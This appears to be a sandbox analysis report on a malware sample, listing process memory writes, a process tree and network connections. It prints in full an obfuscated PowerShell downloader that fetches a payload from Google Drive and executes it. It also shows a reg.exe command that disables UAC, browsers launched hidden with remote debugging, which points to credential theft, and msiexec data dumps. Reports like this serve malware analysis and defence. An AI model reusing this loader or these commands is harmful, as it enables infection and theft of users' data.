PID 1092 wrote to memory of 2356 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2308 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 2308 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe
PID 1092 wrote to memory of 864 N/A C:\Program Files\Google\Chrome\Application\Chrome.exe C:\Program Files\Google\Chrome\Application\Chrome.exe

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\36b44229a81fa005512ea72195083c77844fbd5339c7afb9eaea4505774c1753.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Unshadow Teia Translated Trumbash Kommiserne Unorational Zea #>;$Kadence='Metricizes';<#Tndende Confiserie Tnkningers #>; function Condonement($Bedimple){If ($host.DebuggerEnabled) {$Subcaptaincy++;}$Sydhavnen=$Underdelene+$Bedimple.'Length' - $Subcaptaincy; for ( $Speedbaadenes=4;$Speedbaadenes -lt $Sydhavnen;$Speedbaadenes+=5){$Dispositionernes=$Speedbaadenes;$Tensaw+=$Bedimple[$Speedbaadenes];}$Tensaw;}function Begejstret($renotification){ & ($Proparent) ($renotification);}$Chloride=Condonement 'HartMSkrioProczbjeri S.hlbldnl.siaaProd/ an ';$Centralenhedens=Condonement ',ulpTBi.olUdlss Acy1Pjec2m,ld ';$Uhyrernes='Mono[CuraNAfkrET rntCrim.HuxlSMultEReinR TvrvPhotIBremCswalEBehypFuseo silIF.den HomtDiscM mmua tednSkriA yrpG koeTexaR Bef]Naad:Unde:EvidS KeneAm rCTaasURekoRskrai U atthrayQuadP PetrExp.OLinjTUni,O TilcInd.oCrouLBemr=Lipp$PryeCSob,ED gtnTeletSkudrEfteA humLSpasEDec,NH unhcoryeEkspD Ly,eslvpNt beS th ';$Chloride+=Condonement 'Symp5Jens.Beri0Hjpa F r(Ski,W Adei Cehn FeddEf eobandwOutgsFa.l godtNHernTS gt Sia,1O er0Hv s.,emi0Ords;Dege NedWMismi ysnCon 6Besy4Unco;Re.a Fdevxskra6 non4indl;Ku,i AnafrN ntvSurl:Brut1bowm3Sign1M.na.Butt0Geo.)Outg Mi rG PhieSkatc AchkDis o Aph/ ele2glar0Stem1Poch0Akko0Ant,1Supe0Fulg1St n UhelF UgyiDis.rEfteeFi ofBa voAnlgxEne,/Draw1Fase3Opva1Sad .Auro0Unga ';$Metred=Condonement 'SemiUPolySslkkeKvisrGent-IsenatilegRi pE arbn.erit ide ';$Staveren=Condonement ' Pyrh inktIn etLocapUnsts Cut:D wy/rest/ApprdAflerGeopiUltrvTeeneWitt.BisogcadooNonpoSkovg FedlStopeInds.EphycTrbeoEpitmH ut/ dkluWinzcPlan? ZooePharx UdnpForboAfvrrNemmtSp d=Exi drep.o ,rawEnernPhenlAh aoS rraFrihd Flh& Divi NondKa.e=Imme1 LovDJuicYR.ak3OphaH ron_t in3Ca oZTermOLen OUn.cHElapuForm_ BruyPermw FrspAfmaR Fa,erhomCPompYJe ur BrecWee HApprn Re Z edsADimsv lutxAzurbInteBTremNProggLuniL Rub ';$sprogtalentets=Condonement 'Farv>Brit ';$Proparent=Condonement 'CongIHy,pe U mXSalg ';$Snowfield='Phonoreceptor';$Speedbaadenesnfiltrede='\Kbstadboerne8.tid';Begejstret (Condonement 'Buni$RaseGpennLSoteOBalsBT ikAUn slFrug:Rumft sseiDdslLBlanTTracaSoc lAllaESk bnS.ja=mrkb$E.treTretnOvicvH,ct:TjenaXantpGalvP voudErytA.hatt ReaaEb i+Lava$ParasImpepBdetESy aeKsesD FisbBullA A mA PaaDArbeeAn tnS.onE,ordSMu in,trufDic,I KosLSit t UnsRRim.EP stdKa,mE kan ');Begejstret (Condonement ' m.r$DalegApriLRaadoompoBSup,a S rlSylp:GratTRe,irH ndaPos fsejlinaviK Dipf SafL UnfY upEPa enChroe RecSFul =Sten$MesosFlelTBefoAMetovErnreS.torNoneeSympN G.y.AskaS kspDeo L ramITutrtCert(R nt$Dotis Ov PHa vRDeteoAl nGKrysTSn,bABa yLfantEWarnNArtit .uneA,tethonnS for) po ');Begejstret (Condonement $Uhyrernes);$Staveren=$trafikflyenes[0];$Blea15=(Condonement 'Bred$PaadgbuddlTra OFormB p ea Yumlinac:For N BegAEulor MatRErnr=Def.n LeveBartW Gal-T,llo PlabBacoj S,deK nocExcot K l Est,s S rYComps Re,tBrideBreeMLivm. T lNProfEFurot Tan.NortWEdi E ompBHospcStadlSme IU lieCha NModuT Sel ');Begejstret ($Blea15);Begejstret (Condonement 'Kris$UdviNAutoaBannrStanr Gla.scytHpreoeEguraAxmidP gheS.agrSupesUlce[Ca e$CompM TubeE.ketReflrNyanehalvdV,ri] Tea= ael$ AdmCTendh KrolNeuro odrP neihustd De.eKar, ');$Strikvarers=Condonement 'Bai,$PalaNPul aRinnr UnprPlum.IkenDIlteo GenwChevnVrv lBakho myaDispdGe,sFFet iAberl illePens(G,pe$For SStopt Snaa envRouteE sir ReneStv.nPho ,St.l$ IliCSvo,aQuesrOvercReinoNo.coprisnHlqn) G r ';$Carcoon=$Tiltalen;Begejstret (Condonement ' mad$ TanGTrykLhjtiOmo obStryACortlpira:u vls Fo.EFimbm ifaaT kssRafeiTreeoN.nslCom o upeg veryFert= Tro(SawatMantePampsIndtT.oen-TidspSynkafa,bTF.ldHStar Dune$KragC Ph,aBackr Sd CDetooZincoFo.mnSel,) Ven ');while (!$Semasiology) {Begejstret (Condonement 'Hi h$Fra gSanslBarooAvlebDi haKon.lEfte:BktaEMngdk e osAfgiaOpfimHo ei ryonHijaaKocmt siooprinrStrueNonwrForesStup=Hono$ SputUd ar rusuBenfe Gri ') ;Begejstret $Strikvarers;Begejstret (Condonement 'SwedSVareT NytaRefoRRaketCoun-PrecS rnlU gaE HanEVirkPBi.e Ske 4Galm ');Begejstret (Condonement ' Out$ SupgPr dlMuddoSid bstenAOve LEne.: Fa S UnyeCataMNonaaDi csRu siBlanoOplul PugoMorbGMappy pid=Isep(Corrt Wa.EPersSP,iot Flo- punPRypeaNonrt rieHstni ve e$Coopc angaTr wRAutoCS,dnO O,ko m nnAtta)Kata ') ;Begejstret (Condonement ' L n$ W rgEfteL heOSur BB keArutsl Ref: A tPfa tOFresl ReiIO,tit AtiB.ummUWeatrKlubEFlorAAandUUnpeE Da.ROprasSvkk=Wood$Imp,GChuflRastO mbob CirA,topL und: ForUShyur De.aPh nNChorBUdipe PhorUnprIKonfgB,useAfklLbierSi onE Amp+Chil+Fl.r% ent$SomntfuglRDetaAValufPathiKonsKSweefBlitlEgotyreume SulNsam ESte,SHypn. ogpc akoO RedU rsen S pTPseu ') ;$Staveren=$trafikflyenes[$Politbureauers];}$Tilforladeligere=298086;$Racercyklernes=30728;Begejstret (Condonement 'S,if$DepaGSamlL N uOParab oveACol.LSlag:TabeGOrthrJazze.ardngocaa onAantheBrnenKjorS syeWee R I.f om=Nee HangatheE ContClou-Co vCVarmOBogmn P,ttPreteKaffnB nktBill Bo y$ H,ecM siAConfrTe,tcYo ioHostoApe,NType ');Begejstret (Condonement ' on$ UrrgstbelOveroTannbOveraBarsl P o:DdspCStaroGra.l estl GngiThrecPourl Ey eChar Gasf=i,ma akra[ NonSImmoy irs Hypt unaeFyrrmGa.o. allCU tro OphnSiddvKo.keKlavrAttat Ar ]Frem:Trev:HoejFK rrr Bero opmm eguBC tca KapsApinevejr6Rein4SkriSEpittPaulr EuliHovenStamgLuft(Styr$,ishg sodr RaneE tenGeekaFlova RiseOmsknBiassSvrmeRestrDeco)Unin ');Begejstret (Condonement 'Skue$ SinGStviL Soco BinBUnorAS alLU,de:BaltS jerHSdrra ,idF,kroTNeug Fran=kart Form[PostsNondy RidspulvtTe te isMSeri.KonstDistECo kxhaa tPun .Dip EEkspn Musc FyrOSjledDagbIUn unShe gMod,] nlg: ,tn: CruAU.grs olacEctrIFo bI kla. Sk gRehaeconct MucsAn it.tudRH poIM.idNSpeag Rou(Ind,$ S.lcMonoO AdeLSpydlDet.I F rCFalsl Sp eBid ) Tr ');Begejstret (Condonement 'Hand$,ockgGra lunifoKy.ebTilba agslTesc: ConsBestaNeglls neR.ram= Res$SpadsB hoHTil,a errFmoldTAver. PasSE ilUSlvsB neqsFritTEdu RBemyI DupN.antgProl(Kryp$SkeptBrn iJ hnLSjlefVensOFotoRana,LreedaLancDQua E tjel BehIOmdeGPrebEo terVa,ueGodm,Opha$M,narHackAHospC andesup ROmgrC.atryG arkBlodlHe teInt RVandNJoulesterS Gra) Di, ');Begejstret $salr;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Unshadow Teia Translated Trumbash Kommiserne Unorational Zea #>;$Kadence='Metricizes';<#Tndende Confiserie Tnkningers #>; function Condonement($Bedimple){If ($host.DebuggerEnabled) {$Subcaptaincy++;}$Sydhavnen=$Underdelene+$Bedimple.'Length' - $Subcaptaincy; for ( $Speedbaadenes=4;$Speedbaadenes -lt $Sydhavnen;$Speedbaadenes+=5){$Dispositionernes=$Speedbaadenes;$Tensaw+=$Bedimple[$Speedbaadenes];}$Tensaw;}function Begejstret($renotification){ & ($Proparent) ($renotification);}$Chloride=Condonement 'HartMSkrioProczbjeri S.hlbldnl.siaaProd/ an ';$Centralenhedens=Condonement ',ulpTBi.olUdlss Acy1Pjec2m,ld ';$Uhyrernes='Mono[CuraNAfkrET rntCrim.HuxlSMultEReinR TvrvPhotIBremCswalEBehypFuseo silIF.den HomtDiscM mmua tednSkriA yrpG koeTexaR Bef]Naad:Unde:EvidS KeneAm rCTaasURekoRskrai U atthrayQuadP PetrExp.OLinjTUni,O TilcInd.oCrouLBemr=Lipp$PryeCSob,ED gtnTeletSkudrEfteA humLSpasEDec,NH unhcoryeEkspD Ly,eslvpNt beS th ';$Chloride+=Condonement 'Symp5Jens.Beri0Hjpa F r(Ski,W Adei Cehn FeddEf eobandwOutgsFa.l godtNHernTS gt Sia,1O er0Hv s.,emi0Ords;Dege NedWMismi ysnCon 6Besy4Unco;Re.a Fdevxskra6 non4indl;Ku,i AnafrN ntvSurl:Brut1bowm3Sign1M.na.Butt0Geo.)Outg Mi rG PhieSkatc AchkDis o Aph/ ele2glar0Stem1Poch0Akko0Ant,1Supe0Fulg1St n UhelF UgyiDis.rEfteeFi ofBa voAnlgxEne,/Draw1Fase3Opva1Sad .Auro0Unga ';$Metred=Condonement 'SemiUPolySslkkeKvisrGent-IsenatilegRi pE arbn.erit ide ';$Staveren=Condonement ' Pyrh inktIn etLocapUnsts Cut:D wy/rest/ApprdAflerGeopiUltrvTeeneWitt.BisogcadooNonpoSkovg FedlStopeInds.EphycTrbeoEpitmH ut/ dkluWinzcPlan? ZooePharx UdnpForboAfvrrNemmtSp d=Exi drep.o ,rawEnernPhenlAh aoS rraFrihd Flh& Divi NondKa.e=Imme1 LovDJuicYR.ak3OphaH ron_t in3Ca oZTermOLen OUn.cHElapuForm_ BruyPermw FrspAfmaR Fa,erhomCPompYJe ur BrecWee HApprn Re Z edsADimsv lutxAzurbInteBTremNProggLuniL Rub ';$sprogtalentets=Condonement 'Farv>Brit ';$Proparent=Condonement 'CongIHy,pe U mXSalg ';$Snowfield='Phonoreceptor';$Speedbaadenesnfiltrede='\Kbstadboerne8.tid';Begejstret (Condonement 'Buni$RaseGpennLSoteOBalsBT ikAUn slFrug:Rumft sseiDdslLBlanTTracaSoc lAllaESk bnS.ja=mrkb$E.treTretnOvicvH,ct:TjenaXantpGalvP voudErytA.hatt ReaaEb i+Lava$ParasImpepBdetESy aeKsesD FisbBullA A mA PaaDArbeeAn tnS.onE,ordSMu in,trufDic,I KosLSit t UnsRRim.EP stdKa,mE kan ');Begejstret (Condonement ' m.r$DalegApriLRaadoompoBSup,a S rlSylp:GratTRe,irH ndaPos fsejlinaviK Dipf SafL UnfY upEPa enChroe RecSFul =Sten$MesosFlelTBefoAMetovErnreS.torNoneeSympN G.y.AskaS kspDeo L ramITutrtCert(R nt$Dotis Ov PHa vRDeteoAl nGKrysTSn,bABa yLfantEWarnNArtit .uneA,tethonnS for) po ');Begejstret (Condonement $Uhyrernes);$Staveren=$trafikflyenes[0];$Blea15=(Condonement 'Bred$PaadgbuddlTra OFormB p ea Yumlinac:For N BegAEulor MatRErnr=Def.n LeveBartW Gal-T,llo PlabBacoj S,deK nocExcot K l Est,s S rYComps Re,tBrideBreeMLivm. T lNProfEFurot Tan.NortWEdi E ompBHospcStadlSme IU lieCha NModuT Sel ');Begejstret ($Blea15);Begejstret (Condonement 'Kris$UdviNAutoaBannrStanr Gla.scytHpreoeEguraAxmidP gheS.agrSupesUlce[Ca e$CompM TubeE.ketReflrNyanehalvdV,ri] Tea= ael$ AdmCTendh KrolNeuro odrP neihustd De.eKar, ');$Strikvarers=Condonement 'Bai,$PalaNPul aRinnr UnprPlum.IkenDIlteo GenwChevnVrv lBakho myaDispdGe,sFFet iAberl illePens(G,pe$For SStopt Snaa envRouteE sir ReneStv.nPho ,St.l$ IliCSvo,aQuesrOvercReinoNo.coprisnHlqn) G r ';$Carcoon=$Tiltalen;Begejstret (Condonement ' mad$ TanGTrykLhjtiOmo obStryACortlpira:u vls Fo.EFimbm ifaaT kssRafeiTreeoN.nslCom o upeg veryFert= Tro(SawatMantePampsIndtT.oen-TidspSynkafa,bTF.ldHStar Dune$KragC Ph,aBackr Sd CDetooZincoFo.mnSel,) Ven ');while (!$Semasiology) {Begejstret (Condonement 'Hi h$Fra gSanslBarooAvlebDi haKon.lEfte:BktaEMngdk e osAfgiaOpfimHo ei ryonHijaaKocmt siooprinrStrueNonwrForesStup=Hono$ SputUd ar rusuBenfe Gri ') ;Begejstret $Strikvarers;Begejstret (Condonement 'SwedSVareT NytaRefoRRaketCoun-PrecS rnlU gaE HanEVirkPBi.e Ske 4Galm ');Begejstret (Condonement ' Out$ SupgPr dlMuddoSid bstenAOve LEne.: Fa S UnyeCataMNonaaDi csRu siBlanoOplul PugoMorbGMappy pid=Isep(Corrt Wa.EPersSP,iot Flo- punPRypeaNonrt rieHstni ve e$Coopc angaTr wRAutoCS,dnO O,ko m nnAtta)Kata ') ;Begejstret (Condonement ' L n$ W rgEfteL heOSur BB keArutsl Ref: A tPfa tOFresl ReiIO,tit AtiB.ummUWeatrKlubEFlorAAandUUnpeE Da.ROprasSvkk=Wood$Imp,GChuflRastO mbob CirA,topL und: ForUShyur De.aPh nNChorBUdipe PhorUnprIKonfgB,useAfklLbierSi onE Amp+Chil+Fl.r% ent$SomntfuglRDetaAValufPathiKonsKSweefBlitlEgotyreume SulNsam ESte,SHypn. ogpc akoO RedU rsen S pTPseu ') ;$Staveren=$trafikflyenes[$Politbureauers];}$Tilforladeligere=298086;$Racercyklernes=30728;Begejstret (Condonement 'S,if$DepaGSamlL N uOParab oveACol.LSlag:TabeGOrthrJazze.ardngocaa onAantheBrnenKjorS syeWee R I.f om=Nee HangatheE ContClou-Co vCVarmOBogmn P,ttPreteKaffnB nktBill Bo y$ H,ecM siAConfrTe,tcYo ioHostoApe,NType ');Begejstret (Condonement ' on$ UrrgstbelOveroTannbOveraBarsl P o:DdspCStaroGra.l estl GngiThrecPourl Ey eChar Gasf=i,ma akra[ NonSImmoy irs Hypt unaeFyrrmGa.o. allCU tro OphnSiddvKo.keKlavrAttat Ar ]Frem:Trev:HoejFK rrr Bero opmm eguBC tca KapsApinevejr6Rein4SkriSEpittPaulr EuliHovenStamgLuft(Styr$,ishg sodr RaneE tenGeekaFlova RiseOmsknBiassSvrmeRestrDeco)Unin ');Begejstret (Condonement 'Skue$ SinGStviL Soco BinBUnorAS alLU,de:BaltS jerHSdrra ,idF,kroTNeug Fran=kart Form[PostsNondy RidspulvtTe te isMSeri.KonstDistECo kxhaa tPun .Dip EEkspn Musc FyrOSjledDagbIUn unShe gMod,] nlg: ,tn: CruAU.grs olacEctrIFo bI kla. Sk gRehaeconct MucsAn it.tudRH poIM.idNSpeag Rou(Ind,$ S.lcMonoO AdeLSpydlDet.I F rCFalsl Sp eBid ) Tr ');Begejstret (Condonement 'Hand$,ockgGra lunifoKy.ebTilba agslTesc: ConsBestaNeglls neR.ram= Res$SpadsB hoHTil,a errFmoldTAver. PasSE ilUSlvsB neqsFritTEdu RBemyI DupN.antgProl(Kryp$SkeptBrn iJ hnLSjlefVensOFotoRana,LreedaLancDQua E tjel BehIOmdeGPrebEo terVa,ueGodm,Opha$M,narHackAHospC andesup ROmgrC.atryG arkBlodlHe teInt RVandNJoulesterS Gra) Di, ');Begejstret $salr;"

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\SysWOW64\msiexec.exe"

C:\Windows\SysWOW64\cmd.exe

/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

C:\Windows\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Program Files\Google\Chrome\Application\Chrome.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff84c27cc40,0x7ff84c27cc4c,0x7ff84c27cc58

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1892,i,13676418500481393489,9149949538353177036,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1888 /prefetch:2

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2164,i,13676418500481393489,9149949538353177036,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2168 /prefetch:3

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2256,i,13676418500481393489,9149949538353177036,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2424 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3164,i,13676418500481393489,9149949538353177036,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3184 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,13676418500481393489,9149949538353177036,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3344 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\bkimokiusd"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\lfvwodtoglfqw"

C:\Windows\SysWOW64\msiexec.exe

C:\Windows\System32\msiexec.exe /stext "C:\Users\Admin\AppData\Local\Temp\vzbphvequtxdgldp"

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9222 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4608,i,13676418500481393489,9149949538353177036,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4584 /prefetch:1

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4564,i,13676418500481393489,9149949538353177036,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4708 /prefetch:8

C:\Program Files\Google\Chrome\Application\Chrome.exe

"C:\Program Files\Google\Chrome\Application\Chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4712,i,13676418500481393489,9149949538353177036,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4856 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

--user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\TmpUserData\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\TmpUserData --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x104,0x108,0x10c,0xe4,0x110,0x7ff8418d46f8,0x7ff8418d4708,0x7ff8418d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,2426443740474900385,14164072370701279149,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2136 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,2426443740474900385,14164072370701279149,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,2426443740474900385,14164072370701279149,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2680 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2108,2426443740474900385,14164072370701279149,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3244 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2108,2426443740474900385,14164072370701279149,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3252 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2108,2426443740474900385,14164072370701279149,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5372 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9222 --field-trial-handle=2108,2426443740474900385,14164072370701279149,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5424 /prefetch:1

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 drive.google.com udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 drive.usercontent.google.com udp
GB 172.217.16.225:443 drive.usercontent.google.com tcp
US 8.8.8.8:53 206.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 225.16.217.172.in-addr.arpa udp
US 8.8.8.8:53 205.47.74.20.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
GB 142.250.187.206:443 drive.google.com tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 o.pki.goog udp
GB 142.250.187.227:80 o.pki.goog tcp
